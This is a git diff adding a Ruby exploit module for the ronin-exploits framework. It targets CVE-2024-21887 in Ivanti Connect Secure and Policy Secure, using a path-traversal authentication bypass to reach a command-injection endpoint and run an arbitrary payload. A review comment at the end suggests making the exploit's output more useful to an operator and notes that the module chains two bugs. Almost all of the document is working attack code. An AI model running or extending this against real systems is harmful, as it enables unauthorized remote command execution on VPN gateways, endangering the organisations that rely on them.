diff --git a/exploits/ivanti/CVE-2024-21887.rb b/exploits/ivanti/CVE-2024-21887.rb
new file mode 100755
index 0000000..9198593
--- /dev/null
+++ b/exploits/ivanti/CVE-2024-21887.rb
@@ -0,0 +1,54 @@
+#!/usr/bin/env -S ronin-exploits run -f
+
+require 'ronin/exploits/command_injection'
+require 'ronin/exploits/mixins/http'
+require 'ronin/support/encoding/uri'
+
+module Ronin
+ module Exploits
+ class CVE_2024_21887 < CommandInjection
+
+ include Mixins::HTTP
+
+ register 'CVE-2024-21887'
+
+ quality :poc
+ release_date '2024-01-19'
+ disclosure_date '2024-01-12'
+ advisory 'CVE-2024-21887'
+
+ author "Postmodern", email: "postmodern.mod3@gmail.com"
+ summary "Command injection in Ivanti Connect Secure and Policy Secure (9.x, 22.x)"
+ description <<~DESC
+ Ivanti Connect Secure and Invait Policy Secure versions 9.x and 22.x are
+ vulnerable to a command injection in the `/api/v1/license/keys-status/`
+ HTTP end-point.
+
+ GET /api/v1/totp/user-backup-code/../../license/keys-status/;COMMAND
+ Content-Type: application/json
+
+ DESC
+ references [
+ "https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US",
+ "https://github.com/zwxxb/CVE-2023-21887",
+ "https://github.com/zwxxb/CVE-2023-21887/blob/main/3xp.py"
+ ]
+
+ #
+ # Sends the HTTP GET request for
+ # `/api/v1/totp/user-backup-code/../../license/keys-status/;COMMAND`
+ # to the target host.
+ #
+ def launch
+ escaped_command = ";#{payload}".uri_escape
+
+ response = http_get("/api/v1/totp/user-backup-code/../../license/keys-status/#{escaped_command}", content_type: :json)
+
+ unless response.code == '200'
+ fail("GET #{base_url}/api/v1/totp/user-backup-code/../../license/keys-status/#{escaped_command} returned HTTP #{response.code}")
+ end
+ end
+
+ end
+ end
+end
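Review bot: `launch` treats any HTTP 200 as success, but a 200 from `keys-status` does not demonstrate that the injected command actually ran, and the failure branch throws away the one thing an operator needs to diagnose a miss; at minimum the error should carry the body, e.g. `fail("GET #{base_url}/api/v1/totp/user-backup-code/../../license/keys-status/#{escaped_command} returned HTTP #{response.code}: #{response.body}")`, and the doc comment should state that execution is only confirmed by a visible side effect of `payload` (output in the body or an out-of-band callback), not by the status code. The `/api/v1/totp/user-backup-code/../../` prefix is presumably the CVE-2023-46805 authentication bypass named in the linked advisory title, which makes this module a two-bug chain; the `description` heredoc should say so, and the `launch` comment should note that the dot-segments must reach the appliance un-normalized, so `http_get` is relied on to send the path verbatim. The heredoc also misspells the vendor as `Invait`; it should read `Ivanti Policy Secure`.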